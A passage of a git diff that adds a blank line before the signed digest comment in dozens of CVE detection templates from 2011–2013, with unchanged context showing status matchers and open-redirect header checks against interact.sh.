4a0a00473045022100b77d8df43dc9d5471227b4896b072f47594be3f792a8be12b6a66c43ea82aee002207e476a965bed92922d1e869481768c98cebe368fa5d341dd9c946dafc6c28ca6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 3cd492baef..3e0db22134 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e51e8333f8013bac7814302a4cc43deccb88bdd2ec79395e44bf73e178c7340d022100ee476209eaace73d0b3f5986faca8c77d7c546a6d4771eb3a82ded43b06aed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e51e8333f8013bac7814302a4cc43deccb88bdd2ec79395e44bf73e178c7340d022100ee476209eaace73d0b3f5986faca8c77d7c546a6d4771eb3a82ded43b06aed34:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 62443f0a99..a9bbde532f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025f9e04eac0a207748d869f31e0c19484db1c1758ed80df794bb1c039f609f4d0221009aec6e838ec26db3ec93fd2a4300fc63f09e4c96866dc64a8cc2aa077cc7c272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022025f9e04eac0a207748d869f31e0c19484db1c1758ed80df794bb1c039f609f4d0221009aec6e838ec26db3ec93fd2a4300fc63f09e4c96866dc64a8cc2aa077cc7c272:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index e51046e591..48229a33be 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5519dead6778f22b1862baac5d74fd738a74f7e5eb27cfb489cb27c50449cfb022100cdace10ebad9efd4c37fe1beb2a26012ab51711eaa9db2facf71be1dc3ecd08d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b5519dead6778f22b1862baac5d74fd738a74f7e5eb27cfb489cb27c50449cfb022100cdace10ebad9efd4c37fe1beb2a26012ab51711eaa9db2facf71be1dc3ecd08d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 0ece10f291..56a219c2d9 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e5464c87676e0000a91fa8c3b0f32c38bd8c592f91ef6ae9a5bb847be59b1777022053256485bb7124d6efa5566f51d061873c9e4c04629dc036d3f1d638e7725f64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e5464c87676e0000a91fa8c3b0f32c38bd8c592f91ef6ae9a5bb847be59b1777022053256485bb7124d6efa5566f51d061873c9e4c04629dc036d3f1d638e7725f64:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index b543389335..3588728e24 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203057f4d398b7d86d87fe75b69a7391b66386691b5c72eec893c01c620983ef2a022100d706c49f9d230e22c2c0d8e84d4567ba1e6b83f9136242460170201b2c1522f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203057f4d398b7d86d87fe75b69a7391b66386691b5c72eec893c01c620983ef2a022100d706c49f9d230e22c2c0d8e84d4567ba1e6b83f9136242460170201b2c1522f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index a4efdf4ae3..09b3c7a817 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100bff77f542aab44f26e728e873761fa61abae75dadc655aff9fa91571965e8aca022018a8f0b093db79cecd318b29abd16452fb323e88b87fbfbf95fcfb8d475417ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bff77f542aab44f26e728e873761fa61abae75dadc655aff9fa91571965e8aca022018a8f0b093db79cecd318b29abd16452fb323e88b87fbfbf95fcfb8d475417ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 16c639b657..77cd2e9d40 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ef1d49be05761ee0991c4441b09bc1598d5cb6d1a856e209dd70275bb298e3f102205f79bfefd631e09767313d7693e77654fb2df7397a44734b3762daa0e2207ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ef1d49be05761ee0991c4441b09bc1598d5cb6d1a856e209dd70275bb298e3f102205f79bfefd631e09767313d7693e77654fb2df7397a44734b3762daa0e2207ec8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 75ecffad9a..ef7382dd7d 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac87b9f8c29af9c01e016d3d605136d9d0bd1d0cc8521c4fa73f51a34d881ed40220792962bb6cb7c2fbb7798fcc0e10fbca896fac97a3fad93d8a89726c25144dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ac87b9f8c29af9c01e016d3d605136d9d0bd1d0cc8521c4fa73f51a34d881ed40220792962bb6cb7c2fbb7798fcc0e10fbca896fac97a3fad93d8a89726c25144dcb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index a328816664..890a2fda58 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d0c4d7145f0c74e03b23858f97c37f2bd94e131f9b3d57ceaa2a8eda81331724022100dd0129048936fd97c9a8878e2b2784398ce7c6fc1b89ccfc29a8d43a7ccff706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d0c4d7145f0c74e03b23858f97c37f2bd94e131f9b3d57ceaa2a8eda81331724022100dd0129048936fd97c9a8878e2b2784398ce7c6fc1b89ccfc29a8d43a7ccff706:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index a974a8cff4..b7fea8bad1 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205abc5a0fce7e3f8cbcbe70447f48ca9ee117473b40a2544f614b7fe0d45c349b022100b756bfc4033eb492b7f1668607231667ef460467802109bd2515e1076a442458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205abc5a0fce7e3f8cbcbe70447f48ca9ee117473b40a2544f614b7fe0d45c349b022100b756bfc4033eb492b7f1668607231667ef460467802109bd2515e1076a442458:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 0ba9db9902..76e067d22a 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7b39ebc739d2ddadca400dcb834ef3bfce0fb330b7dffd333b58b3819e04e69022100fe94138e1376e55a1b59cce8c3db05708c2f19a16125088582052f7ef53e5f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f7b39ebc739d2ddadca400dcb834ef3bfce0fb330b7dffd333b58b3819e04e69022100fe94138e1376e55a1b59cce8c3db05708c2f19a16125088582052f7ef53e5f38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index c4156623f4..d92d50c13f 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1bcb0542efda910997fd8e489e9f58e2ec2f6fa34611e537292e065fb6588cc022100ae8bf58d042859aa9952914f50caf85c1d429d9a1cdda4cc2a629e08c254ac46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b1bcb0542efda910997fd8e489e9f58e2ec2f6fa34611e537292e065fb6588cc022100ae8bf58d042859aa9952914f50caf85c1d429d9a1cdda4cc2a629e08c254ac46:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index dc2201931b..0d87f2994f 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022075beafe4d5c9fa7e41e16f48a3a70f98a9ed891b3b91e236ff24740f0a18f22a022059ada886cac6869d84090928bea578a347597e0fe67347d2756b5ff7eab32a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022075beafe4d5c9fa7e41e16f48a3a70f98a9ed891b3b91e236ff24740f0a18f22a022059ada886cac6869d84090928bea578a347597e0fe67347d2756b5ff7eab32a99:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 7b3fa2e575..d40ede0fbc 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -45,4 +45,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a00463044022072db32aa592b8e16dc38f9a4bc0109235a18a7c6f1e2fd2cefaa52faa7c29f56022077d45eb16a13e2f58244634c32e638fead92ef439da04c7017311da7a58aab39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022072db32aa592b8e16dc38f9a4bc0109235a18a7c6f1e2fd2cefaa52faa7c29f56022077d45eb16a13e2f58244634c32e638fead92ef439da04c7017311da7a58aab39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 3a2452c706..69a2235a8e 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064b7ad14dd5b3b5b609daab2e99df6636a5673e96854cb3adca6529544384d85022100b5c0a88a7c9ab737fd6fb8e6acff8c62448b193070b34402c6d140ffc635a07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022064b7ad14dd5b3b5b609daab2e99df6636a5673e96854cb3adca6529544384d85022100b5c0a88a7c9ab737fd6fb8e6acff8c62448b193070b34402c6d140ffc635a07e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 947b77f775..622412ef42 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220481c02293d8727dc840cea8c5b0e1092abc708f7b4b1457d416b350877f99bf5022100b5ad620c19606427d7466c117916d8157395b2e386470c3a883719acd8ef16df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220481c02293d8727dc840cea8c5b0e1092abc708f7b4b1457d416b350877f99bf5022100b5ad620c19606427d7466c117916d8157395b2e386470c3a883719acd8ef16df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index cd096c2920..29452335ab 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022036df375ac5aa36209e1845b32866d134ec7eec19277e4f6631ad1fac12071f22022036cf3f0ec375aa17c083c351eae76ddac14252e8d01291ebefeffb7a15a3f3b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022036df375ac5aa36209e1845b32866d134ec7eec19277e4f6631ad1fac12071f22022036cf3f0ec375aa17c083c351eae76ddac14252e8d01291ebefeffb7a15a3f3b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index f4c5dc4004..5ab73da8b4 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f6676be915c9d1eab404bc2f1e08c3ce5f37fac7b0550380674cffa516a860f022024e5d587311fa1579acdba34af299422d35b6d2c9b75b6ca221b1acc3922ec5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204f6676be915c9d1eab404bc2f1e08c3ce5f37fac7b0550380674cffa516a860f022024e5d587311fa1579acdba34af299422d35b6d2c9b75b6ca221b1acc3922ec5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 001215ec00..024fd2df01 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207b20da583d4e80ac43cca149f9f142217ac281a09d5e7b47c0005ea3afa5dde9022100c2e2070c1eec9523de9f87dbed7e9912b6349bbae1a91179ab413873e0a44009:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207b20da583d4e80ac43cca149f9f142217ac281a09d5e7b47c0005ea3afa5dde9022100c2e2070c1eec9523de9f87dbed7e9912b6349bbae1a91179ab413873e0a44009:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 85e9693751..bb2b198012 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d42d9b559be3550cc7a4805c271ca3bd75514df03959c7c7dd61d23cbab04760220736e5026aedc44b6fbfe2c2544523784ed02ccd3e99507bd2e7a27aa43d53e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207d42d9b559be3550cc7a4805c271ca3bd75514df03959c7c7dd61d23cbab04760220736e5026aedc44b6fbfe2c2544523784ed02ccd3e99507bd2e7a27aa43d53e3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index cb2d7540af..5835189865 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082c782d1260c42c7995d6c8542de23a0ba658be37534fcb00a203cae554e9344022052aecdf648ec2972a00b89c848b8d38e82a0b8c10e5a6373e014bc7818e88b67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210082c782d1260c42c7995d6c8542de23a0ba658be37534fcb00a203cae554e9344022052aecdf648ec2972a00b89c848b8d38e82a0b8c10e5a6373e014bc7818e88b67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index b95b35d1f5..df99356eba 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a004630440220723a6a2ea47f2e85c94c9b1f63a8e1758d0627f5a6044dd677356a18031c6e0b02202d3785814ea82335642b8ba24bde599e55962f20f8bdabbd943443aa44410d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220723a6a2ea47f2e85c94c9b1f63a8e1758d0627f5a6044dd677356a18031c6e0b02202d3785814ea82335642b8ba24bde599e55962f20f8bdabbd943443aa44410d1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 432a889ac2..3077143a62 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220346787c384504be6974dbda7506e5696923a27a806585d6e08b868fbc46fcd1702200cbe2caad0c40302fa90744577c7b675cabfb1f0b65546810b27c86142660847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220346787c384504be6974dbda7506e5696923a27a806585d6e08b868fbc46fcd1702200cbe2caad0c40302fa90744577c7b675cabfb1f0b65546810b27c86142660847:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 40378cb445..453b1295ea 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100c296447288b634b82f28bdcca594e32da53f60411133218ef3f7168c8862151002203cdc8c40066a4885dad7abb9d64365d00e5ec1ee3050fbc2deb5d2428a08adcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c296447288b634b82f28bdcca594e32da53f60411133218ef3f7168c8862151002203cdc8c40066a4885dad7abb9d64365d00e5ec1ee3050fbc2deb5d2428a08adcf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 902f8f7f85..2b7e97b873 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab443a8de7872a84aac8eed6dda36445352619d8746dee06fa916fa5c76b686002202f25938051bab56c6a9f782f2e362e790dacae3e1341be883fefe5e139775314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ab443a8de7872a84aac8eed6dda36445352619d8746dee06fa916fa5c76b686002202f25938051bab56c6a9f782f2e362e790dacae3e1341be883fefe5e139775314:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 75c09a3b91..7f8ef74bd6 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402200982ab6cf7146f4b9a545ca5670c34298c6dd1105a26e67b58ef00c5b8f3ab4e02201c434a42f5c613becd60f8fa34863d6a36b766ce6b1d5a5cefb9eb32140540c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200982ab6cf7146f4b9a545ca5670c34298c6dd1105a26e67b58ef00c5b8f3ab4e02201c434a42f5c613becd60f8fa34863d6a36b766ce6b1d5a5cefb9eb32140540c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index c494dfbcdd..69d464feb8 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088be738b9af3b03dbcb4b46e85f14ba58e9cae6a196aa6ad6d6d93b5170c2467022059cf74a465236a45f55fc5204806c9c1113ebb1383e63f5797510f2abd04e3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210088be738b9af3b03dbcb4b46e85f14ba58e9cae6a196aa6ad6d6d93b5170c2467022059cf74a465236a45f55fc5204806c9c1113ebb1383e63f5797510f2abd04e3cc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index aa6c874ae0..6a8686fe74 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502210092dcc2da849393ea6729da732c99d39f16ff929129df9e12dd4218e26e2a2de50220152b9a699d04f8355a2c0253224f79f97fa095d0633d221402a175ced581b048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210092dcc2da849393ea6729da732c99d39f16ff929129df9e12dd4218e26e2a2de50220152b9a699d04f8355a2c0253224f79f97fa095d0633d221402a175ced581b048:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 3f5641b263..a76ac61d47 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -59,4 +59,5 @@ http: - 200 - 400 condition: or -# digest: 4a0a00473045022100bc9e92808a98a76ad9a71c1fed236ba28b1aa182f301b4ea92af1f2da9aaffe70220654259e687bb9e08ce9cf194095d26e1d1d394fd9abbd4c36c5f80530aa8dfde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bc9e92808a98a76ad9a71c1fed236ba28b1aa182f301b4ea92af1f2da9aaffe70220654259e687bb9e08ce9cf194095d26e1d1d394fd9abbd4c36c5f80530aa8dfde:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 8e0f86b03a..863450b885 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b039d531be89170359c7a0ec00bfda8f52ed1851aadfe27342ae8e9a49989a91022100f4c2d67c142f0d090bba31f49b29e316d6a3b698affd3c1996441b4acb03cd63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b039d531be89170359c7a0ec00bfda8f52ed1851aadfe27342ae8e9a49989a91022100f4c2d67c142f0d090bba31f49b29e316d6a3b698affd3c1996441b4acb03cd63:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index b00b87260c..51e7156bab 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100f4cfb12f30894dde6d5f13a99351a9c290a05771a4c6468a6cf44dc11f8958ef0220790dbbab9d2124fe0db8340b7e018c305750e07ae3f0bc073a3faf1791648e9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f4cfb12f30894dde6d5f13a99351a9c290a05771a4c6468a6cf44dc11f8958ef0220790dbbab9d2124fe0db8340b7e018c305750e07ae3f0bc073a3faf1791648e9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index fa8374ba35..50358c7138 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022034e3034e624033fc98f37625de46580eaea14c42500833b0dd107c35a6e477680220555741f4fda1f5a936de13020a579d56c58f65b9d308a6887b489b1f560559a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022034e3034e624033fc98f37625de46580eaea14c42500833b0dd107c35a6e477680220555741f4fda1f5a936de13020a579d56c58f65b9d308a6887b489b1f560559a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index f8de669844..609b1ec67b 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -55,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a70ea54c30c03a0e36dc6fc5090f9f2306438f4f144aa71ee61fbe5d2b63e7a4022016473b827dc5ec1c842b80f1117c9a8a8b0039954fd280f286290d80d8703cb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a70ea54c30c03a0e36dc6fc5090f9f2306438f4f144aa71ee61fbe5d2b63e7a4022016473b827dc5ec1c842b80f1117c9a8a8b0039954fd280f286290d80d8703cb1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 115c45258d..d89235a9a7 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cd3d1010c67c5512cf008a46976b455eff03d909980f423f626b05e18198673022100a923fae2e4151a4cb772ba9cf5ab05a7a437766450247779f4458995e8986c10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203cd3d1010c67c5512cf008a46976b455eff03d909980f423f626b05e18198673022100a923fae2e4151a4cb772ba9cf5ab05a7a437766450247779f4458995e8986c10:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index a53796804b..5913b820bf 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200adab598d7a81e0e0ba14dbb2169b3ee316681e09971f14648521da5e5911531022100af9971f65d56109693b47b4bb340b49ff1ab42876144ba421d443fad002629e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200adab598d7a81e0e0ba14dbb2169b3ee316681e09971f14648521da5e5911531022100af9971f65d56109693b47b4bb340b49ff1ab42876144ba421d443fad002629e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 77df585c37..96d680c20e 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203529ed2f581f480466e2fbc181f6f23c4ec25a24bd2103c693a5eb98b97af81b022100f354f02c690dfaf7316707ec46e207dbe6245f883be446a0a260e40480641595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203529ed2f581f480466e2fbc181f6f23c4ec25a24bd2103c693a5eb98b97af81b022100f354f02c690dfaf7316707ec46e207dbe6245f883be446a0a260e40480641595:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index dc402d0479..0697ecabde 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 